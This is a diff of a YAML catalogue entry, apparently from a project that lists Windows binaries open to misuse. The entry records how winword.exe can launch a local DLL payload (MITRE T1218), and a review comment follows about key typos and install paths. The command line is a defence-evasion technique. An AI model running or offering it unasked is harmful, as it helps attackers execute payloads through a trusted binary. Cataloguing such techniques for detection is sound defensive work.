@@ -7,20 +7,23 @@ Commands: - Command: winword.exe /l dllfile.dll Description: Launch DLL payload. Usecase: Execute a locally stored DLL using winword.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MItreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE -Code Sample: [] -Detection: [] + - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/vysecurity/status/884755482707210241 - - https://twitter.com/Hexacorn/status/885258886428725250 + - Link: https://twitter.com/vysecurity/status/884755482707210241 + - Link: https://twitter.com/Hexacorn/status/885258886428725250 Acknowledgement: - Person: Vincent Yiu (cmd) Handle: '@@vysecurity' - Person: Adam (Internals) Handle: '@Hexacorn' +--- \ No newline at end of file
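Review bot: Two context lines carry typos that will survive into the generated page: the key `MItreLink:` (capital I) will not match the `MitreLink` key used by every other entry in this commit, so the technique link will be missing from the rendered output, and `Handle: '@@vysecurity'` has a doubled `@`. Fix them to `MitreLink: https://attack.mitre.org/wiki/Technique/T1218` and `Handle: '@vysecurity'` while the file is being re-templated. The `Full Path` lists only `c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE`, whereas Appvlp.yml in this same commit records both the `Program Files` and `Program Files (x86)` variants of the Office install; a matching non-(x86) entry here would be consistent with that.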